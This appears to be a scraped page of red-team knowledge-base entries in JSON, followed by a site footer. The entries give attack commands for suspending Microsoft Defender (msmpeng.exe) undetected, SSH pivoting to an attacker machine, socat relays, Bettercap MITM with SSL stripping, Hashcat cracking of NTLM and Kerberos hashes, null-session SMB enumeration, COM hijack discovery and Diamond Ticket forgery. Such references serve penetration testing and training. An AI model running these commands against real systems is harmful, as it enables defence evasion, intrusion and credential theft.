"id": "e5a98439-d851-45e1-9047-2b36877d7c6d",
"name": "Run the report server",
"description": "",
"tag": "",
"results": [],
"cmd": "gowitness report serve"
}
]
}
New tool: PsSuspend
"name": "PsSuspend",
"phases": [
"10. Bypassing Defenses"
],
"category": "",
"stealthy": false,
"oss": [
"Windows"
],
"source": "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend",
"description": "PsSuspend lets you suspend processes on the local or a remote system, which is desirable in cases where a process is consuming a resource (e.g. network, CPU or disk) that you want to allow different processes to use. Rather than kill the process that's consuming the resource, suspending permits you to let it continue operation at some later point in time.",
"undetected": [
"MDE",
"Windows Defender (AV)"
],
"detected": [],
"commands": [
{
"id": "92efd3ca-227b-4f76-927a-e3a6d0cdd04b",
"name": "Suspend process",
"description": "",
"tag": "",
"results": [],
"cmd": "pssuspend.exe msmpeng.exe"
}
],
"content": ""
}```
New tool: ssh
"name": "ssh",
"phases": [
"00. Infrastructure"
],
"category": "",
"stealthy": false,
"oss": [
"Linux",
"Windows"
],
"source": "n/a",
"description": "SSH or Secure Shell is a network communication protocol that enables two computers to communicate (c.f http or hypertext transfer protocol, which is the protocol used to transfer hypertext such as web pages) and share data.",
"undetected": [],
"detected": [],
"content": "# SSH\n\n## Pivoting\n\n### Portforwarding\nConnect to root@remote with the certificate foo.pem\nRedirect local port 80 on the target to attacker machine 81\n-f: will background the SSH connection\n-N do not execute a command\n'''\nssh -i foo.pem root@<REMOTE> -R 81:localhost:80 -f -N\n'''\n\n",
"commands": [
{
"id": "dcf7b938-00ef-4494-a659-876b100e9b25",
"name": "Portforwarding",
"description": "Redirect local port 80 on the target to attacker machine 81\n-f: will background the SSH connection\n-N do not execute a command",
"tag": "",
"results": [],
"cmd": "ssh -i foo.pem root@<REMOTE> -R 81:localhost:80 -f -N"
}
]
}```
New tool: socat
"name": "socat",
"phases": [
"00. Infrastructure"
],
"category": "",
"stealthy": false,
"oss": [
"Linux",
"Windows"
],
"source": "http://www.dest-unreach.org/socat/",
"description": "socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. \nThese modes include generation of \"listening\" sockets, named pipes, and pseudo terminals.",
"undetected": [],
"detected": [],
"content": "## Redirect TCP traffic\n'''\nsocat TCP4-LISTEN:80,fork TCP4:<REMOTE>:80\n'''\n\n\n",
"commands": [
{
"id": "2eb8949c-105e-424b-aa63-e93072a9d653",
"name": "Forward TCP4 traffic",
"description": "",
"tag": "",
"results": [],
"cmd": "socat TCP4-LISTEN:80,fork TCP4:<REMOTE>:80"
}
]
}```
New tool: qwinsta/quser
{"name":"qwinsta/quser","phases":["03.Host Enumeration"],"requirements":[],"results":[],"category":"","opsec":false,"path":"","oss":["Windows"],"source":"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/qwinsta","description":"Available on Windows servers; requires local admin on target machines.\n\nList logged in users\nqwinsta/quser /server:myremote.server","undetected":[],"detected":[]}
New tool: Process Monitor
{
"name": "Process Monitor",
"phases": [
"01. Initial Access",
"04. Persistence"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows",
"Linux"
],
"source": "https://docs.microsoft.com/en-us/sysinternals/downloads/procmon",
"description": "Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.",
"undetected": [],
"detected": [],
"content": "# Process Monitor\n\n## [[COM Hijacking]]\nFind COM hijacks\n[Process Monitor](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) shows real-time file system, registry and process activity and is very useful in finding different types of privilege escalation primitives.\n\nDue to the sheer number of events generated, filtering is essential to find the ones of interest. We're looking for:\n\n- **RegOpenKey** operations.\n- where the _Result_ is **NAME NOT FOUND**.\n- and the _Path_ ends with **InprocServer32**.\n \n\nVerify that the entry does exist in HKLM, but not in HKCU.\n>Get-Item -Path \"HKLM:\\Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\InprocServer32\"\n\n\n",
"commands": [
{
"id": "97d6f0d7-8443-41d6-864f-81a8fa73d87c",
"name": "Filter for DLL Hijacking CLSID",
"description": "Filter + verify that the entry does exist in HKLM, but not in HKCU",
"tag": "",
"results": [],
"cmd": "Operations = RegOpenKey\nResult = NAME NOT FOUND\nPath ENDSWITH InprocServer32\n\nGet-Item -Path \"HKLM:\\Software\\Classes\\CLSID{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\InprocServer32\""
},
{
"id": "e0a00380-bfe4-47de-aae5-b911ea654ee2",
"name": "Filter for DLL Search-Order-Hijacking",
"description": "",
"tag": "",
"results": [],
"cmd": "Path ENDSWITH .dll\nResult = NAME NOT FOUND\nProcess Name CONTAINS <processname>"
}
]
}
New tool: dig
{"name":"dig","phases":["02.Reconnaissance"],"requirements":[],"results":[],"category":"","opsec":false,"path":"","oss":["Linux"],"source":"https://linux.die.net/man/1/dig","description":"DNS lookup utility\n\ndig @nameserver name recordtype\n\ne.g.\n\ndig @1.1.1.1 myevildoma.in A\n\nVia SOCKS proxy:\nUse +tcp and +vc options to perform DNS requests via TCP.\n","undetected":[],"detected":[]}
Add helfull command to powershell
Get-MpThreatDetection |sort $_.InitialDetectionTime |select -First 1
AppLocker
HKey_Local_Machine\Software\Policies\Microsoft\Windows\SRPV2
HKey_Local_Machine\System\CurrentControlSet\Control\SRP\GP
WDAC
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard -v DeployConfigCIPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard -v ConfigCIPolicyFilePath
New tool: Bettercap
{
"name": "Bettercap",
"phases": [
"02. Reconnaissance",
"08. Credentials & User Impersonation"
],
"category": "",
"stealthy": false,
"platforms": [
"Linux"
],
"source": "https://github.com/bettercap/bettercap",
"description": "A suite for man in the middle attacks",
"undetected": [],
"detected": [],
"content": "Bettercap\n---------\n\n[https://www.bettercap.org/usage/](https://www.bettercap.org/usage/)\n\nMitM with [sslstrip](sslstrip_1297023162.html)\n\n(May not work because of HSTS and the preload list containing websites that need to be HTTPS even on first connect)\n\n## [[08.Credentials & User Impersonation/MITM]]\n'''java\nbettercap -G 192.168.1.1 -T 192.168.1.102 --proxy-https\n'''\n\n\n",
"commands": [
{
"id": "aae91a7b-6ae0-4c0b-b3d5-1298930bfe14",
"name": "MITM with SSL Stripping",
"description": "",
"tag": "",
"results": [],
"cmd": "bettercap -G 192.168.1.1 -T 192.168.1.102 --proxy-https"
}
]
}
New tool: enum4linux
{
"name": "enum4linux",
"phases": [
"02. Reconnaissance"
],
"category": "",
"stealthy": false,
"platforms": [
"Linux"
],
"source": "https://github.com/CiscoCXSecurity/enum4linux",
"description": "About enum4Linux is a Linux alternative to enum.exe for enumerating data from Windows and Samba hosts",
"undetected": [],
"detected": [],
"content": "\n## [[Guest Access (SMB)]]\n> enum4linux -a -u \"\" -p \"\" <dc-ip> \n> enum4linux -a -z \"guest\" -o \" <dc-ip> \n\n## [[User enum]]\n> enum4linux -U <dc-ip> | grep 'user:'\n\n",
"commands": [
{
"id": "3b2630cc-65ab-4928-b46d-fc3f404c9283",
"name": "Commands",
"description": "",
"tag": "",
"results": [],
"cmd": "Usage: ./enum4linux.pl [options] ip\n\nOptions are (like \"enum\"):\n -U get userlist\n -M get machine list*\n -S get sharelist\n -P get password policy information\n -G get group and member list\n -d be detailed, applies to -U and -S\n -u user specify username to use (default \"\") \n -p pass specify password to use (default \"\")"
}
],
"references": [
"https://www.kali.org/tools/enum4linux/#:~:text=Enum4linux%20is%20a%20tool%20for,%2C%20rpclient%2C%20net%20and%20nmblookup"
]
}
New tool: Hashcat
{
"name": "Hashcat",
"phases": [
"02. Reconnaissance",
"08. Credentials & User Impersonation"
],
"category": "",
"stealthy": false,
"platforms": [
"Linux"
],
"source": "https://hashcat.net/hashcat/",
"description": "World's fastest password cracker\nWorld's first and only in-kernel rule engine",
"undetected": [],
"detected": [],
"content": "# Hashcat\n\n\n## Commands\n- '-a 0' specifies the wordlist attack mode.\n- '-m 1000' specifies that the hash is NTLM.\n- 'C:\\Temp\\ntlm.txt' is a text file containing the NTLM hash to crack.\n- 'D:\\Tools\\rockyou.txt' is the wordlist.\n- '-r rules\\add-year.rule' is our custom rule file\n\n## Bruteforce NTLM\n- '-a 3' specifies the mask attack.\n- '?u?l?l?l?l?l?l?l?d' is the mask.\n\n| ? | Charset |\n| --- | -------------------------------------- |\n| l | abcdefghijklmnopqrstuvwxyz |\n| u | ABCDEFGHIJKLMNOPQRSTUVWXYZ |\n| d | 0123456789 |\n| h | 0123456789abcdef |\n| H | 0123456789ABCDEF |\n| s | '!\"#$%&'()*+,-./:;<=>?@[\\]^_''{ \\| }~' |\n| a | ?l?u?d?s |\n| b | 0x00 - 0xff |\n\n## [[Crack Credentials]]\n## Cracking NTLM\n''''''sh\nhashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 1000 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt\n''''''\n\n''''''beacon\nhashcat.exe -a 3 -m 1000 C:\\Temp\\ntlm.txt ?u?l?l?l?l?l?l?l?d\n''''''\n\n## Cracking krb5tgs\n''''''sh\nhashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 13100 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt\n''''''\n\n## Cracking krb5asrep\n''''''sh\nhashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 18200 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt\n''''''\n\n## Cracking netntlmv2\n'''sh\nhashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 5600 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt\n'''\n\n\n",
"commands": [
{
"id": "4dcdc386-2ceb-431c-acf6-a9c2d55130e9",
"name": "Cracking NTLM",
"description": "",
"tag": "",
"results": [],
"cmd": "hashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 1000 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt"
},
{
"id": "e2ec4a29-5912-4fec-8b42-339a639391a7",
"name": "Bruteforce NTLM",
"description": "",
"tag": "",
"results": [],
"cmd": ""
},
{
"id": "da7d5aea-fb2f-411d-bc82-b59f1c96a552",
"name": "Cracking krb5tgs",
"description": "",
"tag": "",
"results": [],
"cmd": "hashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 13100 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt"
},
{
"id": "742234d5-3e4a-4261-b2b7-dad52e4200ae",
"name": "Cracking krb5asrep",
"description": "",
"tag": "",
"results": [],
"cmd": "hashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 18200 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt"
},
{
"id": "2ae08370-f66a-4fac-bad8-da25f0af8ed9",
"name": "Cracking netntlmv2",
"description": "",
"tag": "",
"results": [],
"cmd": "hashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 5600 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt"
},
{
"id": "64f215f3-7434-44fc-8dc1-2118e7db6a1c",
"name": "Bruteforce Rules",
"description": "",
"tag": "",
"results": [],
"cmd": "-a 3 specifies the mask attack.\n?u?l?l?l?l?l?l?l?d is the mask.\n\n?\tCharset\n------------------------\nl\tabcdefghijklmnopqrstuvwxyz\nu\tABCDEFGHIJKLMNOPQRSTUVWXYZ\nd\t0123456789\nh\t0123456789abcdef\nH\t0123456789ABCDEF\ns\t!\"#$%&'()*+,-./:;<=>?@[\\]^_''{ | }~\na\t?l?u?d?s\nb\t0x00 - 0xff"
}
]
}
New technique: Diamond Ticket
"id": "385824c8-406e-47c8-a45c-8c5136415294",
"phase": "08. Credentials & User Impersonation",
"ttp": "T1558",
"external": false,
"description": "Diamond PACs are attackers’ crafted PAC, signed with a stolen KRBTGT key. The Diamond PAC can be\nused by attackers to assign high privileges to a user’s access request, regardless of the user’s original\npermissions.\nIn contrast to the Golden Ticket attack, which also uses a stolen KRBTGT key and can be used to provide\nhigh privileges to the attacker, the Diamond PAC attack does not craft a full Kerberos ticket, but uses the\nstandard Kerberos flow (in the same manner of the MS14-068 exploit) to inject the crafted Diamond\nPAC.\nBy doing so, the Diamond PAC attack represents a more subtle version of the Golden Ticket attack and\nthus harder to detect. Detection rules designed to catch Golden Ticket attack based on the Kerberos\ntraffic anomaly it creates of a user sending a valid TGS with no prior AS requests to obtain a TGT will not\nalert on the Diamond PAC attack",
"category": "",
"stealthy": false,
"tools": [],
"changes": [],
"name": "Diamond Ticket",
"content": "",
"steps": [
{
"id": "aee6a7d0-a9f3-476d-8965-baa349b6c78d",
"name": "Get the KRBTGT",
"description": "",
"requirements": {},
"results": [
"CRED:HASH:KRBTGT"
]
},
{
"id": "fcc5d1d5-1d28-4993-90c6-65e083f75ef1",
"name": "Get the TGTs authentication time",
"description": "",
"requirements": {},
"results": [
"CRED:TICKET:TGT"
]
},
{
"id": "90ec2fb0-6626-4ff8-9e65-de3ceb4f5db8",
"name": "Get the SID of current domain",
"description": "",
"requirements": {},
"results": [
"INTEL:DOMAIN:SID"
]
},
{
"id": "37bd25df-c486-44ed-b6a1-cc8928e598ed",
"name": "Generate diamond ticket",
"description": "",
"requirements": {
"and": [
{
"tag": "CRED:HASH:KRBTGT"
},
{
"tag": "CRED:TICKET:TGT"
},
{
"tag": "INTEL:DOMAIN:SID"
}
]
},
"results": [
"CRED:TICKET:TGT:DIAMOND"
]
}
]
}```
New tool: linedInt
{
"name": "linedInt",
"phases": [
"02. Reconnaissance"
],
"category": "OSINT",
"stealthy": false,
"platforms": [
"Python"
],
"source": "https://github.com/vysecurity/LinkedInt",
"description": "LinkedIn Recon Tool",
"undetected": [],
"detected": [],
"content": "\n## [[LinkedIn]]\n\n",
"commands": [
{
"id": "f570a99e-7685-4e71-9287-d7af8adfb4ea",
"name": "Install",
"description": "",
"tag": "",
"results": [],
"cmd": "git clone https://github.com/vysecurity/LinkedInt\ncd LinkedInt\npip install -r requirements.txt\n\n1. Put in LinkedIn credentials in LinkedInt.cfg\n2. Put Hunter.io API key in LinkedInt.cfg"
},
{
"id": "02da6bcd-848b-484c-b4cf-c4dc1ac948fb",
"name": "Fetch people interactively",
"description": "",
"tag": "",
"results": [],
"cmd": "LinkedInt.py"
}
]
}
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.